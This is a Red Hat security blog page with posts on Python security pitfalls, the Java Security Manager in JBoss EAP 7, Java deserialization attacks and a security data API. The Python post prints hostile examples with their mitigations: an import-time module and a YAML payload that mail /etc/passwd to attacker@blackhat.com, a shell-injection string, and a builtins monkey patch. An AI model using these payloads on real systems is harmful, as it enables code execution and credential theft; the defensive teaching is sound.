Red Hat Customer Portal

Latest Posts

  • A bite of Python

    Authored by: Ilya Etingof

    Python is easy to pick up, and it lets developers progress quickly towards larger and more complicated applications, which is making it increasingly ubiquitous in computing environments. However, the language's apparent clarity and friendliness can lull the vigilance of software engineers and system administrators, luring them into coding mistakes that may have serious security implications. This article, which primarily targets people who are new to Python, looks at a handful of security-related quirks; experienced developers may well be aware of the peculiarities that follow.

    Input function

    Among the large collection of Python 2 built-in functions, input is a total security disaster. Once called, whatever is read from stdin gets immediately evaluated as Python code:

       $ python2
       >>> input()
       dir()
       ['__builtins__', '__doc__', '__name__', '__package__']
       >>> input()
       __import__('sys').exit()
       $
    

    Clearly, the input function must never ever be used unless data on a script's stdin is fully trusted. Python 2 documentation suggests raw_input as a safe alternative. In Python 3 the input function becomes equivalent to raw_input, thus fixing this weakness once and forever.
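
    If the goal is to read a literal Python value (a number, list, dict and so on) from untrusted input, the standard library's ast.literal_eval is a safe alternative to evaluation. A minimal sketch for Python 3:

```python
import ast

# literal_eval parses only Python literals: strings, numbers,
# tuples, lists, dicts, sets, booleans and None
value = ast.literal_eval('[1, 2, 3]')
print(value)  # [1, 2, 3] -- a plain list, no code was executed

# anything else, including function calls, is rejected
try:
    ast.literal_eval("__import__('sys').exit()")
except ValueError:
    print('rejected')
```

    Unlike Python 2's input, the malicious payload above is never executed; it simply fails to parse as a literal.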

    Assert statement

    There is a coding idiom of using assert statements to catch next-to-impossible conditions in a Python application.

       def verify_credentials(username, password):
           assert username and password, 'Credentials not supplied by caller'
    
           ... authenticate possibly null user with null password ...
    

    However, Python produces no instructions at all for assert statements when compiling source code into optimized byte code (e.g. with python -O). That silently removes whatever protection against malformed data the programmer wired into their code, leaving the application open to attacks.

    The root cause of this weakness is that the assert mechanism is designed purely for testing purposes, much like assert in C++. Programmers must use other means for ensuring data consistency.
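
    The safe replacement is an explicit conditional with a raised exception, which survives byte code optimization. A sketch of the same check done robustly:

```python
def verify_credentials(username, password):
    # unlike assert, this check is still performed under python -O
    if not (username and password):
        raise ValueError('Credentials not supplied by caller')
    # ... proceed to authenticate the user ...
```

    The check now fails loudly regardless of how the interpreter was invoked.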

    Reusable integers

    Everything is an object in Python. Every object has a unique identity, which can be read with the id function. To figure out whether two variables or attributes point to the same object, the is operator can be used. Integers are objects, so the is operation is indeed defined for them:

        >>> 999+1 is 1000
        False
    

    If the outcome of the above operation looks surprising, keep in mind that the is operator works with identities of two objects -- it does not compare their numerical, or any other, values. However:

        >>> 1+1 is 2
        True
    

    The explanation for this behavior is that Python maintains a pool of objects representing small integers (in CPython, the range -5 through 256) and reuses them to save on memory and object creation. To make it even more confusing, the exact definition of a "small integer" differs across Python versions and implementations.

    A mitigation here is to never use the is operator for value comparison. The is operator is designed to deal exclusively with object identities.
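
    The difference is easy to demonstrate. The identity results below reflect CPython's small-integer cache and are an implementation detail, not a language guarantee; int() is used so the interpreter cannot constant-fold the values:

```python
# values above the cached range: equal, but distinct objects
a = int('1000')
b = int('1000')
print(a == b)  # True  -- value comparison, always correct
print(a is b)  # False -- two separate objects (CPython)

# values inside the cache are reused, so identity "works" by accident
print(int('7') is int('7'))  # True (CPython implementation detail)
```

    Code that accidentally relies on the second behavior will break as soon as the values leave the cached range.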

    Floats comparison

    Working with floating point numbers may get complicated due to their inherently limited precision and the differences stemming from decimal versus binary fraction representation. One common cause of confusion is that float comparison may sometimes yield unexpected results. Here's a famous example:

       >>> 2.2 * 3.0 == 3.3 * 2.0
       False
    

    The cause of the above phenomenon is indeed a rounding error:

       >>> (2.2 * 3.0).hex()
       '0x1.a666666666667p+2'
       >>> (3.3 * 2.0).hex()
       '0x1.a666666666666p+2'
    

    Another interesting observation is related to the Python float type which supports the notion of infinity. One could reason that everything is smaller than infinity:

       >>> 10**1000000 > float('infinity')
       False
    

    However, prior to Python 3, a type object beats infinity:

       >>> float > float('infinity')
       True
    

    The best mitigation is to stick to integer arithmetic whenever possible. The next best approach would be to use the decimal stdlib module which attempts to shield users from annoying details and dangerous flaws.

    Generally, when important decisions are made based on the outcome of arithmetic operations, care must be taken not to fall victim to a rounding error. See the Floating Point Arithmetic: Issues and Limitations chapter in the Python documentation.
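
    Both mitigations are easy to apply to the example above. The sketch below uses the decimal module for exact decimal arithmetic and math.isclose (available since Python 3.5) for tolerant float comparison:

```python
import math
from decimal import Decimal

# binary floats accumulate rounding error...
print(2.2 * 3.0 == 3.3 * 2.0)                    # False

# ...decimal arithmetic does not
print(Decimal('2.2') * 3 == Decimal('3.3') * 2)  # True

# or compare floats with an explicit tolerance
print(math.isclose(2.2 * 3.0, 3.3 * 2.0))        # True
```

    Note that the Decimal values are constructed from strings: Decimal(2.2) would inherit the binary rounding error of the float literal.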

    Private attributes

    Python does not support hiding object attributes. But there is a workaround based on double underscore attribute name mangling. Mangling is applied only to identifiers appearing in source code; attribute names hardcoded into string constants remain unmodified. This may lead to confusing behavior when a double underscored attribute visibly "hides" from the getattr()/hasattr() functions.

       >>> class X(object):
       ...   def __init__(self):
       ...     self.__private = 1
       ...   def get_private(self):
       ...     return self.__private
       ...   def has_private(self):
       ...     return hasattr(self, '__private')
       ... 
       >>> x = X()
       >>>
       >>> x.has_private()
       False
       >>> x.get_private()
       1
    

    For this privacy feature to work, name mangling is not performed on attribute references outside of the class definition. That effectively "splits" any given double underscored attribute into two, depending on where it is referenced from:

       >>> class X(object):
       ...   def __init__(self):
       ...     self.__private = 1
       >>>
       >>> x = X()
       >>>
       >>> x.__private
       Traceback
       ...
       AttributeError: 'X' object has no attribute '__private'
       >>>
       >>> x.__private = 2
       >>> x.__private
       2
       >>> hasattr(x, '__private')
       True
    

    These quirks could turn into a security weakness if a programmer relies on double underscored attributes for making important decisions in their code without paying attention to the asymmetrical behavior of private attributes.
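
    The mangling rule itself is simple: inside class X, __private is rewritten to _X__private. Knowing that, the "hidden" attribute is always reachable under its mangled name, which makes the asymmetry easy to demonstrate:

```python
class X(object):
    def __init__(self):
        self.__private = 1  # actually stored as _X__private

x = X()

# the plain name is absent; the mangled name is the real attribute
print(hasattr(x, '__private'))    # False
print(getattr(x, '_X__private'))  # 1
print(x.__dict__)                 # {'_X__private': 1}
```

    Any code that hands the mangled name to getattr()/setattr() bypasses the "privacy" entirely, which is why double underscored attributes must never be treated as a security boundary.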

    Module injection

    Python's module import system is powerful and complicated. Modules and packages can be imported by file or directory name found in the search path, as defined by the sys.path list. Search path initialization is an intricate process that also depends on the Python version, platform and local configuration. To mount a successful attack on a Python application, an attacker needs to find a way to smuggle a malicious Python module into a directory or importable package file which Python would consider when trying to import a module.

    The mitigation is to maintain secure access permissions on all directories and package files in the search path to ensure unprivileged users do not have write access to them. Keep in mind that the directory where the initial script invoking the Python interpreter resides is automatically inserted into the search path.

    Running a script like this reveals the actual search path:

       $ cat myapp.py
       #!/usr/bin/python
    
       import sys
       import pprint
    
       pprint.pprint(sys.path)
    

    On the Windows platform, the current working directory of the Python process is injected into the search path instead of the script location. On UNIX platforms, the current working directory is automatically inserted into sys.path whenever program code is read from stdin or the command line (the "-", "-c" or "-m" options):

       $ echo "import sys, pprint; pprint.pprint(sys.path)" | python -
       ['',
        '/usr/lib/python3.3/site-packages/pip-7.1.2-py3.3.egg',
        '/usr/lib/python3.3/site-packages/setuptools-20.1.1-py3.3.egg',
        ...]
       $ python -c 'import sys, pprint; pprint.pprint(sys.path)'
       ['',
        '/usr/lib/python3.3/site-packages/pip-7.1.2-py3.3.egg',
        '/usr/lib/python3.3/site-packages/setuptools-20.1.1-py3.3.egg',
        ...]
       $
       $ cd /tmp
       $ python -m myapp
       ['',
        '/usr/lib/python3.3/site-packages/pip-7.1.2-py3.3.egg',
        '/usr/lib/python3.3/site-packages/setuptools-20.1.1-py3.3.egg',
        ...]
    

    To mitigate the risk of module injection from the current working directory, explicitly changing to a safe directory is recommended prior to running Python on Windows or passing code on the command line.

    Another possible source for the search path is the contents of the $PYTHONPATH environment variable. An easy mitigation against sys.path population from the process environment is the -E option to the Python interpreter, which makes it ignore the $PYTHONPATH variable.
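
    As an additional defensive measure, a script can prune risky entries from sys.path before importing anything else. The sketch below drops empty strings (which stand for the current directory) and relative paths; the exact filtering policy is an assumption that should be adapted to the local deployment:

```python
import os
import sys

def prune_search_path(path_entries):
    """Keep only non-empty, absolute search path entries."""
    return [p for p in path_entries
            if p and os.path.isabs(p)]

# must run before any application imports are attempted
sys.path[:] = prune_search_path(sys.path)
```

    This does not replace correct directory permissions, but it removes the most common injection vector of an attacker-controlled current working directory.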

    Code execution on import

    It may not look obvious that the import statement actually leads to execution of the code in the module being imported. For that reason, even importing an untrusted module or package is risky. Importing a simple module like this may lead to unpleasant consequences:

       $ cat malicious.py
       import os
       import sys
    
       os.system('cat /etc/passwd | mail attacker@blackhat.com')
    
       del sys.modules['malicious']  # pretend it's not imported
       $ python
       >>> import malicious
       >>> dir(malicious)
       Traceback (most recent call last):
       NameError: name 'malicious' is not defined
    

    Combined with sys.path entry injection attack, it may pave the way to further system exploitation.

    Monkey patching

    The process of changing a Python object's attributes at run time is known as monkey patching. Being a dynamic language, Python fully supports run-time program introspection and code mutation. Once a malicious module gets imported one way or another, any existing mutable object can be imperceptibly monkey patched without the programmer's consent. Consider this:

       $ cat nowrite.py
       import builtins
    
       def malicious_open(*args, **kwargs):
          if len(args) > 1 and args[1] == 'w':
             args = ('/dev/null',) + args[1:]
          return original_open(*args, **kwargs)
    
       original_open, builtins.open = builtins.open, malicious_open
    

    If the code above gets executed by Python interpreter, everything written into files won't be stored on the filesystem:

       >>> import nowrite
       >>> open('data.txt', 'w').write('data to store')
       13
       >>> open('data.txt', 'r')
       Traceback (most recent call last):
       ...
       FileNotFoundError: [Errno 2] No such file or directory: 'data.txt'
    

    An attacker could also leverage the Python garbage collector (gc.get_objects()) to get hold of all objects in existence and hack any of them.

    In Python 2, built-in objects can be accessed via the magic __builtins__ module. One of the known tricks exploiting __builtins__ mutability, which might bring the world to its end, is:

       >>> __builtins__.False, __builtins__.True = True, False
       >>> True
       False
       >>> int(True)
       0
    

    In Python 3 assignments to True and False won't work so they can't be manipulated that way.

    Functions are first-class objects in Python and maintain references to many of their properties. In particular, the executable byte code is referenced by the __code__ attribute which, of course, can be modified:

       >>> import shutil
       >>>
       >>> shutil.copy
       <function copy at 0x7f30c0c66560>
       >>> shutil.copy.__code__ = (lambda src, dst: dst).__code__
       >>>
       >>> shutil.copy('my_file.txt', '/tmp')
       '/tmp'
       >>> shutil.copy
       <function copy at 0x7f30c0c66560>
       >>>
    

    Once the above monkey patch is applied, the shutil.copy function still looks sane but silently stops working, because its code has been replaced with that of a no-op lambda.

    The type of a Python object is determined by its __class__ attribute. An evil attacker could hopelessly mess things up by changing the type of live objects:

       >>> class X(object): pass
       ... 
       >>> class Y(object): pass
       ... 
       >>> x_obj = X()
       >>> x_obj
       <__main__.X object at 0x7f62dbe5e010>
       >>> isinstance(x_obj, X)
       True
       >>> x_obj.__class__ = Y
       >>> x_obj
       <__main__.Y object at 0x7f62dbe5d350>
       >>> isinstance(x_obj, X)
       False
       >>> isinstance(x_obj, Y)
       True
       >>> 
    

    The only mitigation against malicious monkey patching is to ensure the authenticity and integrity of the Python modules being imported.

    Shell injection via subprocess

    Python is known as a glue language, so it is quite common for a Python script to delegate system administration tasks to other programs by asking the operating system to execute them, possibly providing additional parameters. The subprocess module offers an easy to use and quite high-level service for such tasks.

       >>> from subprocess import call
       >>>
       >>> unvalidated_input = '/bin/true'
       >>> call(unvalidated_input)
       0
    

    But there is a catch! To make use of UNIX shell services, like command line parameter expansion, the shell keyword argument to the call function must be set to True. The first argument to the call function is then passed as-is to the system shell for further parsing and interpretation. Once unvalidated user input reaches the call function (or other functions implemented in the subprocess module), a hole is opened into the underlying system resources.

       >>> from subprocess import call
       >>>
       >>> unvalidated_input = '/bin/true'
       >>> unvalidated_input += '; cut -d: -f1 /etc/passwd'
       >>> call(unvalidated_input, shell=True)
       root
       bin
       daemon
       adm
       lp
       0
    

    It is obviously much safer not to invoke the UNIX shell for external command execution, by leaving the shell keyword in its default False state and supplying a vector of the command and its parameters to the subprocess functions. In this second invocation form, neither the command nor its parameters are interpreted or expanded by the shell.

       >>> from subprocess import call
       >>>
       >>> call(['/bin/ls', '/tmp'])
    

    If the nature of the application dictates the use of UNIX shell services, it is utterly important to sanitize everything that goes to subprocess making sure that no unwanted shell functionality can be exploited by malicious users. In newer Python versions, shell escaping can be done with the standard library's shlex.quote function.
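
    shlex.quote (available since Python 3.3) wraps a string so the shell treats it as a single literal word, which neutralizes the metacharacters used in the earlier attack:

```python
import shlex

unvalidated_input = '/bin/true; cut -d: -f1 /etc/passwd'

# the quoted form is a single, inert shell word
quoted = shlex.quote(unvalidated_input)
print(quoted)  # the whole payload wrapped in single quotes

# safe to embed in a larger shell command line, e.g.:
# subprocess.call('ls -l %s' % quoted, shell=True)
```

    Strings containing only safe characters are returned unchanged; anything else is single-quoted so the ";" no longer terminates a command.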

    Temporary files

    While vulnerabilities based on improper use of temporary files strike many programming languages, they are still surprisingly common in Python scripts so it's probably worth mentioning here.

    Vulnerabilities of this kind leverage insecure file system access permissions, possibly involving intermediate steps, ultimately leading to data confidentiality or integrity issues. Detailed description of the problem in general can be found in CWE-377.

    Luckily, Python is shipped with the tempfile module in its standard library which offers high-level functions for creating temporary file names "in the most secure manner possible". Beware the flawed tempfile.mktemp implementation which is still present in the library for backward compatibility reasons. The tempfile.mktemp function must never be used! Instead, use tempfile.TemporaryFile, or tempfile.mkstemp if you need the temporary file to persist after it is closed.
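
    In code, the safe pattern looks like this: tempfile.mkstemp creates the file atomically (using O_EXCL) with owner-only permissions and returns an already-open descriptor, so no attacker can race between name generation and file creation:

```python
import os
import tempfile

# mkstemp creates the file with mode 0600 and O_CREAT|O_EXCL
fd, path = tempfile.mkstemp(suffix='.txt')
try:
    with os.fdopen(fd, 'w') as f:
        f.write('sensitive data')
finally:
    os.unlink(path)
```

    For short-lived scratch files that need no name at all, tempfile.TemporaryFile is simpler still.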

    Another way of accidentally introducing a weakness is through the use of the shutil.copyfile function. The problem here is that the destination file is created in the most insecure manner possible.

    Security-savvy developer may consider first copying the source file into a random temporary file name, then renaming the temporary file to its final name. While this may look like a good plan, it can be rendered insecure by the shutil.move function if it is used for performing the renaming. Trouble is that if the temporary file is created on a file system other than the one where the final file is to reside, shutil.move will fail to move it atomically (via os.rename) and silently resort to the insecure shutil.copy. A mitigation would be to prefer os.rename over shutil.move as os.rename is guaranteed to fail explicitly on operations across file system boundaries.

    Further complications may arise from the inability of shutil.copy to copy all file meta data potentially leaving the created file unprotected.

    Not exclusively specific to Python, care must be taken when modifying files on file systems of non-mainstream types, especially remote ones. Data consistency guarantees tend to differ in the area of file access serialization. As an example, NFSv2 does not honour the O_EXCL flag to the open system call, which is crucial for atomic file creation.

    Insecure deserialization

    Many data serialization techniques exist; among them, Pickle is designed specifically to de/serialize Python objects. Its goal is to dump live Python objects into an octet stream for storage or transmission, and then reconstruct them, possibly in another instance of Python. The reconstruction step is inherently risky if the serialized data has been tampered with. The insecurity of Pickle is well recognized and clearly noted in the Python documentation.
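
    When pickled data must be loaded at all, the Python documentation suggests restricting which globals an Unpickler may resolve. The sketch below forbids every global, which still allows plain data structures through while rejecting payloads that reference functions or classes:

```python
import io
import pickle

class SafeUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # refuse to resolve any global; plain literals still load fine
        raise pickle.UnpicklingError(
            'global %s.%s is forbidden' % (module, name))

# plain containers and scalars need no globals to reconstruct
payload = pickle.dumps({'answer': 42, 'items': [1, 2, 3]})
print(SafeUnpickler(io.BytesIO(payload)).load())
```

    A real application would typically allowlist a handful of known-safe classes in find_class instead of rejecting everything; even then, pickle should only ever be fed data from trusted sources.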

    Being a popular configuration file format, YAML is not necessarily perceived as a powerful serialization protocol capable of tricking a deserializer into executing arbitrary code. What makes it even more dangerous is that the de facto default YAML implementation for Python, PyYAML, makes deserialization look very innocent:

       >>> import yaml
       >>>
       >>> dangerous_input = """
       ... some_option: !!python/object/apply:subprocess.call
       ...   args: [cat /etc/passwd | mail attacker@blackhat.com]
       ...   kwds: {shell: true}
       ... """
       >>> yaml.load(dangerous_input)
       {'some_option': 0}
    

    ...while /etc/passwd is being stolen. The suggested fix is to always use yaml.safe_load for handling YAML input you can't trust. Still, the current PyYAML default feels somewhat provoking, considering that other serialization libraries tend to use the dump/load function names for similar purposes, but in a safe manner.

    Templating engines

    Web application authors adopted Python long ago. Over the course of a decade, quite a number of Web frameworks have been developed. Many of them utilize templating engines for generating dynamic web contents from, well, templates and runtime variables. Aside from web applications, templating engines found their way into completely different software such as the Ansible IT automation tool.

    When content is rendered from static templates and runtime variables, there is a risk of user-controlled code injection through the runtime variables. A successfully mounted attack against a web application may lead to a cross-site scripting vulnerability. The usual mitigation for server-side template injection is to sanitize the contents of template variables before they are interpolated into the final document. The sanitization can be done by denying, stripping off or escaping characters that are special to any given markup or other domain-specific language.

    Unfortunately, templating engines do not seem to lean towards tighter security here -- looking at the most popular implementations, none of them applies an escaping mechanism by default, relying instead on the developer's awareness of the risks.

    For example, Jinja2, which is probably one of the most popular tools, renders everything:

       >>> from jinja2 import Environment
       >>>
       >>> template = Environment().from_string('{{ variable }}')
       >>> template.render(variable='<script>do_evil()</script>')
       '<script>do_evil()</script>'
    

    ...unless one of many possible escaping mechanisms is explicitly engaged by reversing its default settings:

       >>> from jinja2 import Environment
       >>>
       >>> template = Environment(autoescape=True).from_string('{{ variable }}')
       >>> template.render(variable='<script>do_evil()</script>')
       '&lt;script&gt;do_evil()&lt;/script&gt;'
    

    An additional complication is that, in certain use-cases, programmers do not want to sanitize all template variables, intentionally leaving some of them holding potentially dangerous content intact. Templating engines address that need by introducing "filters" to let programmers explicitly sanitize the contents of individual variables. Jinja2 also offers a possibility of toggling the escaping default on a per-template basis.

    It can get even more fragile and complicated if developers choose to escape only a subset of markup language tags, letting others legitimately sneak into the final document.

    Conclusion

    This blog post is not meant to be a comprehensive list of all potential traps and shortcomings specific to the Python ecosystem. The goal is to raise awareness of security risks that may come into being once one starts coding in Python, hopefully making programming more enjoyable, and our lives more secure.

    Posted: 2016-09-07T13:30:00+00:00
  • Using the Java Security Manager in Enterprise Application Platform 7

    Authored by: Jason Shepherd

    JBoss Enterprise Application Platform (EAP) 7 allows the definition of Java security policies per application. The way it's implemented also makes it possible to define security policies per module, in addition to defining one per application. The ability to apply the Java Security Manager per application, or per module, makes EAP 7 a versatile tool for mitigating serious security issues, and useful for applications with strict security requirements.

    The main difference between EAP 6 and 7 is that EAP 7 implements the Java Enterprise Edition 7 specification. Part of that specification is the ability to add Java Security Manager permissions per application. How that works in practice is that the application server defines a minimum set of policies that must be enforced, as well as a maximum set of policies that an application is allowed to grant to itself.

    Let’s say we have a web application which wants to read Java System Properties. For example:

    System.getProperty("java.home");

    If you run with the Security Manager enabled, this call throws an AccessControlException. To enable the Security Manager, start JBoss EAP 7 with the -secmgr option, or set SECMGR to true in the standalone or domain configuration files.

    Now if you added the following permissions.xml file to the META-INF folder in the application archive, you could grant permissions for the Java System Property call:

    Add to META-INF/permissions.xml of application:

    <permissions ..>
            <permission>
                    <class-name>java.util.PropertyPermission</class-name>
                    <name>*</name>
                    <actions>read,write</actions>
            </permission>
    </permissions>
    

    The Wildfly Security Manager in EAP 7 also provides some extra methods for performing privileged actions, that is, actions that won't trigger a security check. To use these methods, the application needs to declare a dependency on the Wildfly Security Manager. Developers can use them instead of the built-in PrivilegedAction machinery to improve the performance of security checks. There are a few of these optimized methods:

    • getPropertyPrivileged
    • getClassLoaderPrivileged
    • getCurrentContextClassLoaderPrivileged
    • getSystemEnvironmentPrivileged

    For more information about custom features built into the Wildfly Security Manager, see this presentation slide deck by David Lloyd.

    Out of the box EAP 7 ships with a minimum, and maximum policy like so:

    $EAP_HOME/standalone/configuration/standalone.xml:

    <subsystem xmlns="urn:jboss:domain:security-manager:1.0">
        <deployment-permissions>
            <maximum-set>
                <permission class="java.security.AllPermission"/>
            </maximum-set>
        </deployment-permissions>
    </subsystem>
    

    That doesn't enforce any particular permissions on applications, and grants them AllPermission if they don't define their own. If an administrator wanted to grant at least the permission to read system properties to all applications, they could add this policy:

    $EAP_HOME/standalone/configuration/standalone.xml:

    <subsystem xmlns="urn:jboss:domain:security-manager:1.0">
        <deployment-permissions>
            <minimum-set>
                <permission class="java.util.PropertyPermission" name="*" actions="read,write"/>
            </minimum-set>
            <maximum-set>
                <permission class="java.security.AllPermission"/>
            </maximum-set>
        </deployment-permissions>
    </subsystem>
    

    Alternatively, if they wanted to deny applications all permissions except a specific FilePermission, they could use a maximum policy like so:

    <subsystem xmlns="urn:jboss:domain:security-manager:1.0">
        <deployment-permissions>
            <maximum-set>
                <permission class="java.io.FilePermission" name="/tmp/abc" actions="read,write"/>
            </maximum-set>
        </deployment-permissions>
    </subsystem>
    

    Doing so would mean that the previously described web application, which required PropertyPermission, would fail to deploy, because it tries to grant itself a permission on properties that is not granted by the application administrator. There is a chapter on using the Security Manager in the official documentation for EAP 7.

    Enabling the Security Manager after development of an application can be troublesome, because a developer would then need to add the correct policies one at a time, as the AccessControlExceptions were hit. However, the Wildfly Security Manager in EAP 7 will have a debug mode which, if enabled, doesn't enforce permission checks but logs violations of the policy. In this way, a developer can see all the permissions which need to be added after one test run of the application. This feature hasn't been backported from upstream yet; however, a request to get it backported has been made. In the EAP 7 GA release you can get extra information about access violations by enabling DEBUG logging for org.wildfly.security.access.

    When you run with the Security Manager in EAP 7, each module is able to declare its own set of unique permissions. If you don't define permissions for a module, a default of AllPermission is granted. Being able to define Security Manager policies per module is powerful because it limits the impact if a sensitive or vulnerable feature of the application server is compromised. That gives Red Hat the ability to provide a workaround for a known security vulnerability via a configuration change to a module. For example, to restrict the permissions of the JGroups modules to only what is required, you could add the following permissions block to the JGroups module descriptor:

    $EAP_HOME/modules/system/layers/base/org/jgroups/main/module.xml:

    <permissions>
        <grant permission="java.io.FilePermission" name="${env.EAP_HOME}/modules/system/layers/base/org/jgroups/main/jgroups-3.6.6.Final-redhat-1.jar" actions="read"/>
        <grant permission="java.util.PropertyPermission" name="jgroups.logging.log_factory_class" actions="read"/>
        <grant permission="java.io.FilePermission" name="${env.EAP_HOME}/modules/system/layers/base/org/jboss/as/clustering/jgroups/main/wildfly-clustering-jgroups-extension-10.0.0.CR6-redhat-1.jar" actions="read"/>
        ...
    </permissions>
    

    In EAP 7 GA the use of ${env.EAP_HOME} as above won't work yet. That feature has been implemented upstream, and its backporting can be tracked. It will make file paths compatible between systems by adding support for system property and environment variable expansion in module.xml permission blocks, making the release of generic security permissions viable.

    While the Security Manager could be used to provide multi-tenancy for the application server, Red Hat does not think it is suitable for that. Our Java multi-tenancy in OpenShift is achieved by running each tenant's application in a separate Java Virtual Machine, with the operating system providing sandboxing via SELinux. This was discussed within the JBoss community, with the view of Red Hat reflected in this post.

    In conclusion, EAP 7 introduces the Wildfly Java Security Manager, which allows an application developer to define security policies per application, while also allowing an application administrator to define security policies per module, or a set of minimum or maximum security permissions for applications. Enabling the Security Manager will have an impact on performance. Red Hat recommends taking a holistic approach to application security, and not relying on the Security Manager alone.

    Posted: 2016-07-13T13:30:00+00:00
  • Java Deserialization attacks on JBoss Middleware

    Authored by: Jason Shepherd

    Recent research by Chris Frohoff and Gabriel Lawrence has exposed gadget chains in various libraries that allow code to be executed during object deserialization in Java. They've done some excellent research, including publishing some code that allows anyone to serialize a malicious payload that when deserialized runs the operating system command of their choice, as the user which started the Java Virtual Machine (JVM). The vulnerabilities are not with the gadget chains themselves but with the code that deserializes them.

    What is a gadget chain?

    Perhaps the simplest example is a list. With some types of lists, it's necessary to compare objects in order to determine their order in the list. For example, a PriorityQueue orders objects by comparing them with each other during its construction. It takes a Comparator object which can call any method you choose on the objects in the list. Now if that method contains a call to Runtime.exec(), then you can execute that code during construction of the PriorityQueue object.

    Mitigation

    There are a couple of ways in which this type of attack on the JVM can be mitigated:

    1. not deserializing untrusted objects;
    2. not having the classes used in the 'gadget chain' in the classpath;
    3. running the JVM as a non-root operating system user, with reduced privileges;
    4. egress filtering not allowing any outbound traffic other than that matching a connection for which the firewall already has an existing state table entry.

    The first is the best approach, as it prevents every kind of gadget chain a malicious attacker can create, even one devised from classes in the JVM itself. The second is OK, but has its limits, as new gadget chains are made public often and it's hard to keep up with the growing tide of them. Fortunately, Enterprise Application Platform (EAP) 6 introduced a module classloader that restricts which classes are available in the classpath of each module. It's much harder to find a classloader that has access to all the classes used by a gadget chain.

    The 3rd and 4th options are just good general security practices. If you want to serve content on port 80 of your host, you should use a firewall or load balancer to redirect requests from port 80 to the JVM on another port above 1024, where your unprivileged JVM process is listening. You should not run a JVM as root in order to bind to a port below 1024, as doing so allows a compromised JVM to run commands as root.

    Egress filtering is particularly useful as a mitigation against deserialization attacks because output from the remote code execution is not returned to the attacker. The technique used by Java deserialization attacks results in the normal flow of Java execution being interrupted and an exception being thrown. So while an attacker has the write and execute permissions of the user running the JVM, they don't have access to read files or shell command output, unless they can open a new connection which "phones home".

    EAP 5

    EAP 5 is still widely used, and does allow deserialization of untrusted objects via the Legacy Invoker Servlet. On top of that, its classloading structure is flat, with most libraries, including the classes from the gadget chains, available in the classpath. For anyone still running EAP 5 it is highly recommended to only bind the Legacy Invoker Servlet to a network interface card (NIC) which is not publicly accessible. This also applies to products layered on EAP 5, such as SOA-Platform (SOA-P) 5.

    EAP 6 and EAP 7

    While EAP 6, and EAP 7 are more robust because of the module classloader system, they can still be vulnerable. Users of these versions who are utilizing the clustering features should ensure that they are running their clustering on a dedicated Virtual Local Area Network (VLAN) and not over the Internet. That includes users of JBoss Data Grid (JDG) which uses the clustering features in the default configuration. If you don’t have a dedicated VLAN make sure you encrypt your clustering traffic. This issue is addressed in the JBoss Middleware product suite by the fix for CVE-2016-2141.

    Summary

    While deserialization attacks are a serious threat to JBoss Middleware, with the correct planning, and deployment configuration, the risk can be greatly reduced. Anyone running EAP 5, or layered products, should disable or restrict access to the Legacy Invoker Servlet, while anyone using the clustering feature in EAP should apply the fix for CVE-2016-2141, or make sure their clustering traffic is sent only over a dedicated VLAN.

    Posted: 2016-07-06T13:30:00+00:00
  • Redefining how we share our security data.

    Authored by: Vincent Danen

    Red Hat Product Security has long provided various bits of machine-consumable information to customers and users via our Security Data page. Today we are pleased to announce that we have made it even easier to access and parse this data through our new Security Data API service.

    While we have provided this information since January 2005, it required end users to download the content from the site, which meant you either downloaded many files and kept a local copy, or you were downloading large files on a regular basis. It also meant that, if you were looking for certain criteria, you had to account for them when writing your parser, which could make it more complex and difficult to write.

    Although the Security Data API doesn’t remove the need for a parser (you need something to handle the provided data), it does offer a lot of search options so that you can leverage the API to obtain real time data.

    So what information can you obtain via the API? Currently it provides CVE information for flaws that affected components we ship in supported products, as well as CVRF (Common Vulnerability Reporting Framework) documents and OVAL (Open Vulnerability Assessment Language) definitions. While CVRF documents and OVAL definitions are provided in their native XML format, the API also provides that information in JSON format for easier parsing. This means that you can use any CVRF or OVAL parser with the feed, and you can also write your own JSON parser to get the representative data for them as well.

    Most users will be interested in the CVE data, which we have been providing as part of our CVE database since August 2009. If you wanted to get information on CVE-2016-0800, for instance, you would visit the CVE page: https://access.redhat.com/security/cve/CVE-2016-0800. If you were using this information for some vulnerability assessment or reporting, you would have had to do some web scraping and involve other documents on our Security Data page.

    With the Security Data API you can view the information for this CVE in two ways: XML and JSON. This uses our own markup to describe the flaw, and from this view you can see the CVSSv2 score and metrics (or CVSSv3 score and metrics), as well as impact rating, links to Bugzilla, the date it went public, and other details of the flaw.

    While this is interesting, and we think it will be incredibly useful, the really compelling part of the API is the search queries you can perform. For instance, if you wanted to find all Critical impact flaws with a CVSSv2 score of 8 or greater, you would visit https://access.redhat.com/labs/securitydataapi/cve.json?severity=critical&cvss_score=8.0 and get a nice JSON output of CVEs that meet these criteria.

    If you wanted to find all CVEs that were public a week ago (assuming today is June 1st 2016), you would use https://access.redhat.com/labs/securitydataapi/cve.json?after=2016-05-24 and if you further wanted to get only those that affected the firefox package, you would use https://access.redhat.com/labs/securitydataapi/cve.json?after=2016-05-24&package=firefox.

    Perhaps you only want information on the CVEs that were addressed in RHSA-2016:1217. You could use https://access.redhat.com/labs/securitydataapi/cve.json?advisory=RHSA-2016:1217 to get the list of CVEs and some of their details and then iterate through the CVEs to get further details of each.
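    Queries like the ones above compose mechanically, so they are easy to script. A minimal sketch using only the standard library (the URL patterns follow the examples above; the helper name is our own):

```python
from urllib.parse import urlencode

API_BASE = "https://access.redhat.com/labs/securitydataapi"

def cve_query_url(**params):
    """Build a Security Data API CVE query URL from search parameters."""
    query = urlencode(params)
    return f"{API_BASE}/cve.json?{query}" if query else f"{API_BASE}/cve.json"

# All Critical flaws with a CVSSv2 score of 8.0 or greater:
critical = cve_query_url(severity="critical", cvss_score="8.0")

# CVEs public after a date, limited to the firefox package:
recent_firefox = cve_query_url(after="2016-05-24", package="firefox")
```

    Fetching one of these URLs returns a JSON list of CVEs that any JSON parser can consume, which can then be iterated over to retrieve per-CVE detail pages.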

    The same search parameters are available for CVRF documents and OVAL definitions. You have the flexibility to obtain the details via XML or JSON. The ability to get the data in multiple formats allows you to write parsers for any of these formats and also allows you to write the parsers in any language you choose. These parsers can further take arguments such as severity, date ranges, CVSS scores, CWE identifiers, package names and more, which are in turn used as search criteria when using the API.

    Red Hat Product Security strives to be as transparent as possible when it comes to how we handle security flaws, and the Security Data page has been the primary source of this information, as far as machine-consumable content is concerned. With the availability of the Security Data API, we think this is the best and most user-friendly way to consume this content and are pleased to provide it. Being able to programmatically obtain this information on-the-fly will now allow Red Hat customers and users to generate all kinds of interesting reports, or enhance existing reports, all in real-time.

    We are also pleased to say that the beta API does not require any kind of authentication or login to access and it is available for anyone to use.

